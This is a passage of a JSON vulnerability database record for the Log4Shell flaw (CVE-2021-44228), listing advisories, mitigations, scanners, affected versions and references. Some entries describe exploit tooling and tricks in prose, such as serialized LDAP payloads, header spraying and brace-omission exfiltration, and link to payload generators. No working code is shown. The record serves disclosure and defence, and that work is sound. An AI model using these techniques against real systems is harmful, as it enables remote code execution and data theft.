"content": "Subject: Entrust Cloud Services response to Log4J Vulnerability\n Message Group: Security Vulnerabilities\nMessage Expiry Date: 1/31/22\nOn December 10, 2021, details emerged about a critical remote code execution vulnerability in Apache Log4j, assigned as CVE-2021-44228, in which users who can cause specifically crafted strings to be processed by an application\u0027s Log4j logging layer may be able to execute code and thereby take control of the server hosting the affected application. The official security advisory from Apache can be found here: https://logging.apache.org/log4j/2.x/security.html\n\n Entrust has investigated the impact of CVE-2021-44228 in all of our hosted services. Entrust is continuing to monitor and asses ongoing product impacts and will perform additional actions as necessary. Product-specific details known at the time of writing are below.\n\n Impact of Vulnerability:\n\n Entrust Certificate Services:\n Entrust Certificate Services has sufficiently strong network controls to prevent direct exploitation. Additionally, Entrust has performed mitigations consistent with the Apache Log4j advisory. Note that the on-premise Discovery Agent component is affected, and is covered in Entrust Security Bulletin E21-008. Discovery Agent is out of support and superseded by Entrust Discovery Scanner, which is not affected.\n\n PKI as a Service (PKIaaS):\n Entrust has performed mitigations on PKI as a Service (PKIaaS) consistent with the Apache Log4j advisory, and additionally is applying product patches to update Log4j to version 2.15 or later. \n\n Remote Signing Service:\n Remote Signing Service has sufficiently strong network controls and has incoming data validation that prevent direct exploitation. Entrust is applying product patches to update Log4j to version 2.15 or later. \n\n Signing Automation Service:\n Entrust has performed mitigations for Signing Automation Service consistent with the Apache Log4j advisory, and additionally will apply product patches to update Log4j to version 2.15 as the patches become available.\n\n Ongoing Mitigating Efforts:\n Entrust is monitoring our hosted services for exploit attempts related to this vulnerability, and will take additional action as necessary. For all environments listed above, Entrust has initiated a review and mitigation process with its vendors supplying 3rd party products used in these environments, and will take actions as necessary.\n\n Corrective Action:\n No customer action is required at this time. Further information will be communicated in product-specific bulletins as necessary.",
"name": "donotreply@entrust.com - Certificate Services Message Center - Entrust Cloud Services response to Log4J Vulnerability",
"timestamp": "2021-12-13",
"type": "EVIDENCE",
"url": ""
},
{
"content": "Malware being delivered by #log4j base64 encoded two payloads serving ELF 32-bit LSB executable, Intel 80386 sha256sum a4b278170b0cb798ec930938b5bd45bbf12370a1ccb31a2bee6b2c406d881df6 contains many layer 4 and layer 7 attack functions",
"name": "https://twitter.com/_larry0/status/1470362325463015428",
"timestamp": "2021-12-13",
"type": "EVIDENCE",
"url": "https://twitter.com/_larry0/status/1470362325463015428"
},
{
"content": "Just added support to LDAP Serialized Payloads in the JNDI-Exploit-Kit. This attack path works in *ANY* java version as long the classes used in the Serialized payload are in the application classpath. Do not rely on your java version being up-to-date and update your log4j ASAP!",
"name": "https://twitter.com/marcioalm/status/1470361495405875200",
"timestamp": "2021-12-13",
"type": "EVIDENCE",
"url": "https://twitter.com/marcioalm/status/1470361495405875200"
},
{
"name": "https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/",
"type": "EVIDENCE",
"url": "https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/"
},
{
"name": "ABC News - New cyber vulnerability poses \u0027severe risk,\u0027 DHS says",
"type": "EVIDENCE",
"url": "https://abcnews.go.com/US/cyber-vulnerability-poses-severe-risk-dhs/story?id=81713422"
},
{
"content": "This repo contains operational information regarding the vulnerability in the Log4j logging library (CVE-2021-44228).",
"name": "Log4j Vulnerability (CVE-2021-44228)",
"type": "EVIDENCE",
"url": "https://github.com/NCSC-NL/log4shell"
},
{
"name": "Technologies using Apache Log4j",
"type": "EVIDENCE",
"url": "https://gist.github.com/noperator/d360de81c061bc9c628b12d3f0e1e479"
},
{
"name": "Comments on the CVE-2021-44228 vulnerability",
"type": "EVIDENCE",
"url": "http://slf4j.org/log4shell.html"
},
{
"name": "https://www.ncsc.nl/actueel/advisory?id=NCSC-2021-1052",
"type": "EVIDENCE",
"url": "https://www.ncsc.nl/actueel/advisory?id=NCSC-2021-1052"
},
{
"content": "Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload.",
"name": "nse-log4shell",
"type": "EVIDENCE",
"url": "https://github.com/Diverto/nse-log4shell"
},
{
"content": "log4shell.tools is a tool allows you to run a test to check whether one of your applications is affected by a vulnerability in log4j: CVE-2021-44228.",
"name": "log4shell.tools",
"type": "EVIDENCE",
"url": "https://github.com/alexbakker/log4shell-tools"
},
{
"content": "fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts",
"name": "log4j-scan",
"type": "EVIDENCE",
"url": "https://github.com/fullhunt/log4j-scan"
},
{
"content": "Simple Python 3 script to detect the \"Log4j\" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading",
"name": "log4j-detect",
"type": "EVIDENCE",
"url": "https://github.com/takito1812/log4j-detect"
},
{
"name": "Log4Shell: Reconnaissance and post exploitation network detection",
"type": "EVIDENCE",
"url": "https://research.nccgroup.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/"
},
{
"name": "https://musana.net/2021/12/13/log4shell-Quick-Guide/",
"type": "EVIDENCE",
"url": "https://musana.net/2021/12/13/log4shell-Quick-Guide/"
},
{
"name": "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/",
"type": "EVIDENCE",
"url": "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/"
},
{
"content": "",
"name": "https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/",
"timestamp": "",
"type": "EVIDENCE",
"url": "https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/"
},
{
"content": "This is a forked modified version of the great exploitation tool created by @welk1n (https://github.com/welk1n/JNDI-Injection-Exploit). Here is what I\u0027ve updated on his tool:\n\n Added support to serialized java payloads to LDAP payloads. This allows exploitation of any java version as long the classes are present in the application classpath ignoring completely the trustURLCodebase=false.",
"name": "JNDI-Exploit-Kit",
"type": "EVIDENCE",
"url": "https://github.com/pimps/JNDI-Exploit-Kit"
},
{
"content": "JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server. RMI server and LDAP server are based on marshals and modified further to link with HTTP server.",
"name": "JNDI-Injection-Exploit",
"type": "EVIDENCE",
"url": "https://github.com/welk1n/JNDI-Injection-Exploit"
},
{
"name": "Google Cloud recommendations for investigating and responding to the Apache \u201cLog4j 2\u201d vulnerability (CVE-2021-44228)",
"type": "EVIDENCE",
"url": "https://cloud.google.com/blog/products/identity-security/recommendations-for-apache-log4j2-vulnerability"
},
{
"name": "Google Cloud IDS signature updates to help detect CVE-2021-44228 Apache Log4j vulnerability",
"type": "EVIDENCE",
"url": "https://cloud.google.com/blog/products/identity-security/cloud-ids-to-help-detect-cve-2021-44228-apache-log4j-vulnerability"
},
{
"name": "Log4Shell Hell: anatomy of an exploit outbreak",
"type": "EVIDENCE",
"url": "https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/"
},
{
"name": "https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/",
"type": "EVIDENCE",
"url": "https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/"
},
{
"name": "Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited",
"type": "EVIDENCE",
"url": "https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html"
},
{
"name": "Inside the Log4j2 vulnerability (CVE-2021-44228)",
"type": "EVIDENCE",
"url": "https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/"
},
{
"name": "http://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html",
"type": "EVIDENCE",
"url": "http://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html"
},
{
"name": "https://research.kudelskisecurity.com/2021/12/10/log4shell-critical-severity-apache-log4j-remote-code-execution-being-actively-exploited-cve-2021-44228/",
"type": "EVIDENCE",
"url": "https://research.kudelskisecurity.com/2021/12/10/log4shell-critical-severity-apache-log4j-remote-code-execution-being-actively-exploited-cve-2021-44228/"
},
{
"name": "Remote code injection in Log4j",
"type": "EVIDENCE",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"name": "PSA: Log4Shell and the current state of JNDI injection",
"type": "EVIDENCE",
"url": "https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/"
},
{
"name": "Widespread Exploitation of Critical Remote Code Execution in Apache Log4j",
"type": "EVIDENCE",
"url": "https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/"
},
{
"name": "https://isc.sans.edu/diary/rss/28120",
"type": "EVIDENCE",
"url": "https://isc.sans.edu/diary/rss/28120"
},
{
"name": "https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228",
"type": "EVIDENCE",
"url": "https://www.veracode.com/blog/security-news/urgent-analysis-and-remediation-guidance-log4j-zero-day-rce-cve-2021-44228"
},
{
"name": "https://www.blumira.com/cve-2021-44228-log4shell/",
"type": "EVIDENCE",
"url": "https://www.blumira.com/cve-2021-44228-log4shell/"
},
{
"name": "https://news.ycombinator.com/item?id=29542896",
"type": "EVIDENCE",
"url": "https://news.ycombinator.com/item?id=29542896"
},
{
"content": "Interesting Log4j payload I discovered, simply omit the closing brace }, and now you will potentially get a bunch of data exfiltrated to your server until the next } appears in that data. Had it work on a FANG target",
"name": "https://twitter.com/TomAnthonySEO/status/1470374984749133825",
"timestamp": "2021-12-13",
"type": "EVIDENCE",
"url": "https://twitter.com/TomAnthonySEO/status/1470374984749133825"
},
{
"content": "A Byte Buddy Java agent-based fix for CVE-2021-44228, the log4j 2.x \"JNDI LDAP\" vulnerability.\n\nIt does three things:\n\n* Disables the internal method handler for jndi: format strings (\"lookups\").\n* Logs a message to System.err (i.e stderr) indicating that a log4j JNDI attempt has been made (including the format string attempted, with any ${} characters sanitized to prevent transitive injections).\n* Resolves the format string to \"(log4j jndi disabled)\" in the log message (to prevent transitive injections).",
"name": "log4j-jndi-be-gone",
"type": "FIX",
"url": "https://github.com/nccgroup/log4j-jndi-be-gone"
},
{
"name": "Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration",
"type": "EVIDENCE",
"url": "https://blog.cloudflare.com/exploitation-of-cve-2021-44228-before-public-disclosure-and-evolution-of-waf-evasion-patterns/"
},
{
"content": "A fast firewall reverse proxy with TLS (HTTPS) and swarm support for preventing Log4J (Log4Shell aka CVE-2021-44228) attacks.",
"name": "log4jail",
"type": "EVIDENCE",
"url": "https://github.com/mufeedvh/log4jail"
},
{
"name": "https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/",
"type": "EVIDENCE",
"url": "https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/"
},
{
"name": "https://github.com/jfrog/log4j-tools",
"type": "EVIDENCE",
"url": "https://github.com/jfrog/log4j-tools"
},
{
"name": "https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/",
"type": "EVIDENCE",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/"
},
{
"name": "https://research.nccgroup.com/2021/12/12/log4j-jndi-be-gone-a-simple-mitigation-for-cve-2021-44228/",
"type": "EVIDENCE",
"url": "https://research.nccgroup.com/2021/12/12/log4j-jndi-be-gone-a-simple-mitigation-for-cve-2021-44228/"
},
{
"name": "https://blog.cloudflare.com/log4j-cloudflare-logs-mitigation/",
"type": "EVIDENCE",
"url": "https://blog.cloudflare.com/log4j-cloudflare-logs-mitigation/"
},
{
"content": "Log4Shell RCE Exploit - fully independent exploit does not require any 3rd party binaries. The exploit spraying the payload to all possible logged HTTP Headers such as X-Forwarding , Server-IP , User-Agent",
"name": "https://github.com/cyberstruggle/L4sh",
"type": "EVIDENCE",
"url": "https://github.com/cyberstruggle/L4sh"
},
{
"name": "https://www.catonetworks.com/blog/log4j-a-look-into-threat-actors-exploitation-attempts/",
"type": "EVIDENCE",
"url": "https://www.catonetworks.com/blog/log4j-a-look-into-threat-actors-exploitation-attempts/"
},
{
"name": "https://www.wired.com/story/log4j-log4shell/",
"type": "WEB",
"url": "https://www.wired.com/story/log4j-log4shell/"
},
{
"name": "https://www.theregister.com/2021/12/13/log4j_rce_latest/",
"type": "WEB",
"url": "https://www.theregister.com/2021/12/13/log4j_rce_latest/"
},
{
"content": "This is a dirty hack spring boot hello world proejct to test your tooling/payloads/detection capabilities locally before you hit production targets with them.\n\nThe configured Log4j version is 2.13.0",
"name": "https://github.com/zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service",
"type": "EVIDENCE",
"url": "https://github.com/zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service"
},
{
"name": "https://chasersystems.com/discrimiNAT/blog/log4shell-and-its-traces-in-a-network-egress-filter/",
"type": "EVIDENCE",
"url": "https://chasersystems.com/discrimiNAT/blog/log4shell-and-its-traces-in-a-network-egress-filter/"
},
{
"name": "https://www.theregister.com/2021/12/15/log4j_latest_cisa/",
"type": "WEB",
"url": "https://www.theregister.com/2021/12/15/log4j_latest_cisa/"
},
{
"content": "This tool provides you with the ability to scan internal (only) subnets for vulnerable log4j web services. It will attempt to send a JNDI payload to each discovered web service (via the methods outlined below) to a list of common HTTP/S ports. For every response it receives, it will log the responding host IP so we can get a list of the vulnerable servers.\n\nIf there is a \"SUCCESS\", this means that some web service has received the request, was vulnerable to the log4j exploit and sent a request to our TCP server.\n\nThe tool does not send any exploits to the vulnerable hosts, and is designed to be as passive as possible.",
"name": "log4jScanner",
"type": "EVIDENCE",
"url": "https://github.com/proferosec/log4jScanner"
},
{
"name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache",
"type": "EVIDENCE",
"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache"
},
{
"name": "https://www.cisa.gov/emergency-directive-22-02",
"type": "EVIDENCE",
"url": "https://www.cisa.gov/emergency-directive-22-02"
},
{
"name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/22/mitigating-log4shell-and-other-log4j-related-vulnerabilities",
"type": "ARTICLE",
"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/22/mitigating-log4shell-and-other-log4j-related-vulnerabilities"
},
{
"name": "https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/",
"type": "ARTICLE",
"url": "https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/"
},
{
"name": "https://therecord.media/google-more-than-35000-java-packages-impacted-by-log4j-vulnerabilities/",
"type": "ARTICLE",
"url": "https://therecord.media/google-more-than-35000-java-packages-impacted-by-log4j-vulnerabilities/"
},
{
"name": "https://twitter.com/erratarob/status/1475247078066450432",
"type": "EVIDENCE",
"url": "https://twitter.com/erratarob/status/1475247078066450432"
},
{
"name": "https://www.msn.com/en-xl/news/other/apache-log4j-bug-china-e2-80-99s-industry-ministry-pulls-support-from-alibaba-cloud-for-not-reporting-flaw-to-government-first/ar-AAS2Rht",
"type": "ARTICLE",
"url": "https://www.msn.com/en-xl/news/other/apache-log4j-bug-china-e2-80-99s-industry-ministry-pulls-support-from-alibaba-cloud-for-not-reporting-flaw-to-government-first/ar-AAS2Rht"
},
{
"name": "https://twitter.com/beauwoods/status/1479118516829622275?s=11",
"type": "EVIDENCE",
"url": "https://twitter.com/beauwoods/status/1479118516829622275?s=11"
},
{
"name": "https://4jfinder.github.io/",
"type": "EVIDENCE",
"url": "https://4jfinder.github.io/"
},
{
"name": "Neutralizing Your Inputs: A Log4Shell Weakness Story",
"type": "ARTICLE",
"url": "https://medium.com/@CWE_CAPEC/neutralizing-your-inputs-a-log4shell-weakness-story-89954c8b25c9"
},
{
"name": "Four million outdated Log4j downloads were served from Apache Maven Central alone despite vuln publicity blitz",
"type": "ARTICLE",
"url": "https://www.theregister.com/2022/01/11/outdated_log4j_downloads/"
},
{
"name": "Sonatype Log4j Download Dashboard",
"type": "ARTICLE",
"url": "https://www.sonatype.com/resources/log4j-vulnerability-resource-center"
}
],
"reporter": "kurtseifried",
"reporter_id": 582211,
"vendor_name": "Apache",
"vulnerability_type": [
"CWE-502 Deserialization of Untrusted Data",
"CWE-400 Uncontrolled Resource Consumption",
"CWE-20 Improper Input Validation"
]
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2021-44228"
],
"details": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.",
"id": "GSD-2021-44228",
"modified": "2023-12-13T01:23:20.725867Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cisa.gov": {
"cveID": "CVE-2021-44228",
"dateAdded": "2021-12-10",
"dueDate": "2021-12-24",
"product": "Log4j2",
"requiredAction": "For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.",
"shortDescription": "Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.",
"vendorProject": "Apache",
"vulnerabilityName": "Apache Log4j2 Remote Code Execution Vulnerability"
},
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security@apache.org",
"ID": "CVE-2021-44228",
"STATE": "PUBLIC",
"TITLE": "Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Apache Log4j2",
"version": {
"version_data": [
{
"version_affected": "\u003e=",
"version_name": "log4j-core",
"version_value": "2.0-beta9"
},
{
"version_affected": "\u003c",
"version_name": "log4j-core",
"version_value": "2.3.1"
},
{
"version_affected": "\u003e=",
"version_name": "log4j-core",
"version_value": "2.4"
},
{
"version_affected": "\u003c",
"version_name": "log4j-core",
"version_value": "2.12.2"
},
{
"version_affected": "\u003e=",
"version_name": "log4j-core",
"version_value": "2.13.0"
},
{
"version_affected": "\u003c",
"version_name": "log4j-core",
"version_value": "2.15.0"
}
]
}
}
]
},
"vendor_name": "Apache Software Foundation"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "This issue was discovered by Chen Zhaojun of Alibaba Cloud Security Team."
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": [
{
"other": "critical"
}
],
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-502 Deserialization of Untrusted Data"
}
]
},
{
"description": [
{
"lang": "eng",
"value": "CWE-400 Uncontrolled Resource Consumption"
}
]
},
{
"description": [
{
"lang": "eng",
"value": "CWE-20 Improper Input Validation"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://logging.apache.org/log4j/2.x/security.html",
"refsource": "MISC",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"name": "[oss-security] 20211210 CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"refsource": "MLIST",
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/1"
},
{
"name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"refsource": "MLIST",
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/2"
},
{
"name": "20211210 Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021",
"refsource": "CISCO",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"refsource": "MLIST",
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/3"
},
{
"name": "https://security.netapp.com/advisory/ntap-20211210-0007/",
"refsource": "CONFIRM",
"url": "https://security.netapp.com/advisory/ntap-20211210-0007/"
},
{
"name": "https://security.netapp.com/advisory/ntap-20211210-0007/",
"refsource": "CONFIRM",
"url": "https://security.netapp.com/advisory/ntap-20211210-0007/"
},
{
"name": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"name": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032",
"refsource": "CONFIRM",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032",
"refsource": "CONFIRM",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"name": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html",
"refsource": "CONFIRM",
"url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"
},
{
"name": "DSA-5020",
"refsource": "DEBIAN",
"url": "https://www.debian.org/security/2021/dsa-5020"
},
{
"name": "[debian-lts-announce] 20211212 [SECURITY] [DLA 2842-1] apache-log4j2 security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"
},
{
"name": "FEDORA-2021-f0f501d01f",
"refsource": "FEDORA",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/"
},
{
"name": "Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2",
"refsource": "MS",
"url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/"
},
{
"name": "[oss-security] 20211213 Re: CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2",
"refsource": "MLIST",
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/2"
},
{
"name": "[oss-security] 20211213 CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2",
"refsource": "MLIST",
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/1"
},
{
"name": "[oss-security] 20211214 CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack",
"refsource": "MLIST",
"url": "http://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"name": "20211210 A Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021",
"refsource": "CISCO",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"name": "VU#930724",
"refsource": "CERT-VN",
"url": "https://www.kb.cert.org/vuls/id/930724"
},
{
"name": "https://twitter.com/kurtseifried/status/1469345530182455296",
"refsource": "MISC",
"url": "https://twitter.com/kurtseifried/status/1469345530182455296"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf",
"refsource": "CONFIRM",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"
},
{
"name": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html"
},
{
"name": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"name": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"
},
{
"name": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html",
"refsource": "CONFIRM",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"
},
{
"name": "20211210 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021",
"refsource": "CISCO",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"name": "[oss-security] 20211215 Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack",
"refsource": "MLIST",
"url": "http://www.openwall.com/lists/oss-security/2021/12/15/3"
},
{
"name": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html"
},
{
"name": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html"
},
{
"name": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html"
},
{
"name": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"
},
{
"name": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf",
"refsource": "CONFIRM",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"
},
{
"name": "FEDORA-2021-66d6c484f3",
"refsource": "FEDORA",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/"
},
{
"name": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf",
"refsource": "CONFIRM",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf",
"refsource": "CONFIRM",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"
},
{
"name": "https://www.oracle.com/security-alerts/cpujan2022.html",
"refsource": "MISC",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"name": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"
},
{
"name": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md",
"refsource": "MISC",
"url": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md"
},
{
"name": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"
},
{
"name": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"
},
{
"name": "20220314 APPLE-SA-2022-03-14-7 Xcode 13.3",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2022/Mar/23"
},
{
"name": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001",
"refsource": "MISC",
"url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001"
},
{
"name": "https://github.com/cisagov/log4j-affected-db",
"refsource": "MISC",
